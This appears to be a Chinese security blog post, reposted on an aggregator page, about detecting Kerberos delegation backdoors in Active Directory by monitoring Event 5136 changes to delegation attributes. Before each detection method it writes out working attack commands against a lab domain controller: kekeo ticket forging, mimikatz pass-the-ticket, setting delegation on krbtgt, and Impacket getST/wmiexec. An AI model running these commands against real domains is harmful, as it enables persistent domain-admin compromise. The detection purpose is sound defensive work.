服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

基于AD Event日志监测域委派后门

日期: 来源:Bypass收集编辑:Bypass

01、简介

域委派是指将域内用户的权限委派给服务账号,使得服务账号能以用户权限开展域内活动。攻击者在获取到域控权限后,可以利用约束委派或者基于资源的约束委派实现后门,以实现达到维持权限的目的。

基于AD Event日志监视对特定 Active Directory 属性的修改,从而发现可疑的域委派后门。

02、约束委派攻击场景

假设服务账号配置了到域控的约束性委派,当攻击者控制了服务账号,就可以伪造任意用户的TGT,来打造一个变种的黄金票据。

(1)设置约束委派

setspn -U -A cifs/test  test

(2)构造服务账户test的票据

kekeo.exe "tgt::ask /user:test /domain:evil.com /password:abc123! /ticket:test.kirbi" "exit"

(3)利用伪造的票据,向域服务器申请CIFS服务票据。

kekeo.exe "tgs::s4u /tgt:TGT_test@EVIL.COM_krbtgt~evil.com@EVIL.COM.kirbi /user:administrator@evil.com /service:cifs/WIN-DC01" "exit"

(4)使用mimikatz将该票据注入当前的会话中。

mimikatz.exe "kerberos::ptt TGS_administrator@evil.com@EVIL.COM_test@EVIL.COM.kirbi" "exit"

(5)访问目标共享盘。

dir \\win-dc01\c$

检测方法:攻击手法的核心点在于攻击者需要修改msDS-AllowedToDelegateTo属性,因此我们只需要检测对msDS-AllowedToDelegateTo属性的修改,可以通过5136日志来监控。

安全规则:

03、基于资源的约束委派攻击场景

攻击者在获取到域控权限后,可以利用基于资源的约束委派实现后门,通过对krbtgt用户设置委派属性,以实现达到维持权限的目的。

(1)设置属性值并查询

Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount testGet-ADUser krbtgt -Properties PrincipalsAllowedToDelegateToAccount

(2)获取ST,并使用wmiexec登录域控。

python getST.py -dc-ip 192.168.44.136 -spn krbtgt -impersonate administrator evil.com/test:abc123!set KRB5CCNAME=administrator.ccachepython wmiexec.py -no-pass -k administrator@win-dc01 -dc-ip 192.168.44.136

检测方法:攻击手法的核心点在于攻击者需要修改msDS-AllowedToActOnBehalfOfOtherIdentity属性,因此我们只需要检测对msDS-AllowedToActOnBehalfOfOtherIdentity属性的修改,可以通过5136日志来监控。

安全规则:

相关阅读

  • 让等待变得有趣 - 智行loading设计探索

  • 写在前面设计移动端应用产品时,我们绝大多数的精力和时间都会花在各个页面的设计上。但是细节化的设计不仅可以提高整体视觉,更能带来舒适的交互体验。本文将围绕智行loading
  • 应用密码学:CBC-mode padding oracle

  • 从这一次作业开始感觉没学过本科密码学的应该就看不懂了,因为涉及到不少的概念。不过就当一个自己的笔记吧。第三次作业的链接(可以点击阅读原文直接跳转):https://cseweb.ucsd.
  • 网络安全事件的防护与响应详解

  • 网络安全事件的发生,往往意味着一家企业的生产经营活动受到影响,甚至数据资产遭到泄露。日益复杂的威胁形势使现代企业面临更大的网络安全风险。因此,企业必须提前准备好响应网
  • 闲鱼大终端UI组件库——FishUI建设之路

  • 背景随着闲鱼前端架构的不断演进,一些关键技术设施需要结合业务特征逐步自建,技术方案也要拥抱社区来提升可扩展性。一方面, 闲鱼跨端开发框架kun 让前端开发者使用JS/CSS/HTML
  • 招商固收|债市温度计

  • 01 高频指标跟踪本周(2月13日至2月19日),招商固收基本面监测体系中,共有63个高频指标更新。我们对其中50个指标计算当月同比,结果显示:总体上,“利好”与“利空”指标个数分别为27

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 基于AD Event日志监测域委派后门

  • 01、简介域委派是指将域内用户的权限委派给服务账号,使得服务账号能以用户权限开展域内活动。攻击者在获取到域控权限后,可以利用约束委派或者基于资源的约束委派实现后门,以实
  • 2023 Todo List

  • 2023年,如约而至。回到老家过年,看着许多熟悉的人、熟悉的房子,总感觉一切都好像在昨天。内心难得平静,终于可以停下脚步,去复盘一下自己这一年的经历,收拾一下心情,重新出发。从这